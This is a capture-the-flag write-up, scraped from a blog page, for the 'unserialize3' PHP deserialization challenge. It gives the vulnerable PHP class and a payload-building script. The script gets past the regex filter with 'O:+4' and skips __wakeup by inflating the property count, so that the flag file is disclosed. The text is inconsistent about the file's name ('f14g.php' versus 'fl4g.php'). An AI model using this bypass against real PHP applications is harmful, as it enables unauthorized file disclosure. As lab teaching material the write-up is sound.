当前位置:网站首页>Solution to the problem of unserialize3 in the advanced web area of the attack and defense world
Solution to the problem of unserialize3 in the advanced web area of the attack and defense world
2022-07-08 00:16:00 【B_ secretary】
<?php
class Demo {
private $file = 'index.php';
// Constructors , Call automatically when the variable is created ,__ Means magic method , When the conditions are met, it will automatically call
public function __construct($file) {
$this->file = $file;
//“->” stay PHP Equivalent to Python Of “.”, Methods used to call objects
}
// Destructor , Call automatically when the variable is destroyed
function __destruct() {
echo @highlight_file($this->file, true);
}
// Print file The content in , Show the document to the reader
/* highlight_file(filename,return) Function to highlight the syntax of the file , If return Parameter is set to true, Then the function will return the highlighted code , Instead of outputting them .
The whole code means that when the file is destroyed, it will output $file Code for .at Symbol (@) stay PHP Used as an error control operator in . When the expression is attached @ The symbol , Error messages that may be generated by this expression will be ignored .*/
// It will be called automatically when deserializing
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
// Change the file name to “index.php”
}
}
if (isset($_GET['var'])) {
/* Judgment variable var Is it created , Checks whether the variable is set and not NULL, This code is to detect whether it is passed get Requested var Variable */
$var = base64_decode($_GET['var']);
// take var Explain base64 code
if (preg_match('/[oc]:\d+:/i', $var)) {
// matching var Whether there is a string in
die('stop hacking!');
} else {
@unserialize($var);
// Deserialization var, This will call wakeup function
}
} else {
highlight_file("index.php");
// Highlight index.php, This is not the result we want
}
?>
The topic source code tells us flag stay f14g.php in , So we want to enter this file , that payload Need to meet :
1、 It doesn't contain preg_match Or directly bypass preg_match function
2、 Deserialization bypasses wakeup function
So we use serialization to construct a var Pass in , Let variable value be equal to f14g.php, When the variable is destroyed, it will be displayed by the destructor f14g.php
structure payload Code :
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
$this->file = 'index.php';
}
}
}
$payload = new Demo('fl4g.php');// Create objects Demo, Its file The value is f14g.php
$payload = serialize($payload);// Serialization operation
$payload = str_replace('O:4', 'O:+4',$payload);
// Will be one of the “0:4” Switch to “0:+4” So as to bypass the regularities
$payload = str_replace(':1:', ':2:' ,$payload);
// Number of objects in serialization “1” Change it to “2”, To bypass the wakeup function ( If the value of the number of objects recorded in the serialization is larger than the real number of objects, you can bypass wakeup)
// Nonprintable white space in serialization is equivalent to %00, It needs to be in payload Medium plus
echo base64_encode($payload); // For parameters base64 Code and print out
?>
边栏推荐
- 【编程题】【Scratch二级】2019.09 制作蝙蝠冲关游戏
- Preliminary test of optical flow sensor: gl9306
- Open display PDF file in web page
- Tencent security released the white paper on BOT Management | interpreting BOT attacks and exploring ways to protect
- 从服务器到云托管,到底经历了什么?
- [question de programmation] [scratch niveau 2] oiseaux volants en décembre 2019
- How can CSDN indent the first line of a paragraph by 2 characters?
- The difference between -s and -d when downloading packages using NPM
- Daily question brushing record (16)
- 哪个券商公司开户佣金低又安全,又靠谱
猜你喜欢
Detailed explanation of interview questions: the history of blood and tears in implementing distributed locks with redis
3年经验,面试测试岗20K都拿不到了吗?这么坑?
【推荐系统基础】正负样本采样和构造
FFA and ICGA angiography
Pypharm uses, and the third-party library has errors due to version problems
Notice on organizing the second round of the Southwest Division (Sichuan) of the 2021-2022 National Youth electronic information intelligent innovation competition
全自动化处理每月缺卡数据,输出缺卡人员信息
QT and OpenGL: load 3D models using the open asset import library (assimp)
How does the markdown editor of CSDN input mathematical formulas--- Latex syntax summary
35岁真就成了职业危机?不,我的技术在积累,我还越吃越香了
随机推荐
redis你到底懂不懂之list
Robomaster visual tutorial (0) Introduction
数据库查询——第几高的数据?
Handwriting a simulated reentrantlock
ROS from entry to mastery (IX) initial experience of visual simulation: turtlebot3
备库一直有延迟,查看mrp为wait_for_log,重启mrp后为apply_log但过一会又wait_for_log
[the most detailed in history] statistical description of overdue days in credit
Is Zhou Hongyi, 52, still young?
自动化测试:Robot FrameWork框架90%的人都想知道的实用技巧
商品的设计等整个生命周期,都可以将其纳入到产业互联网的范畴内
Common selectors are
Robomaster visual tutorial (10) target prediction
【史上最详细】信贷中逾期天数统计说明
Set up personal network disk with nextcloud
If an exception is thrown in the constructor, the best way is to prevent memory leakage?
The difference between -s and -d when downloading packages using NPM
去了字节跳动,才知道年薪 40w 的测试工程师有这么多?
从服务器到云托管,到底经历了什么?
某马旅游网站开发(登录注册退出功能的实现)
如何衡量产品是否“刚需、高频、痛点”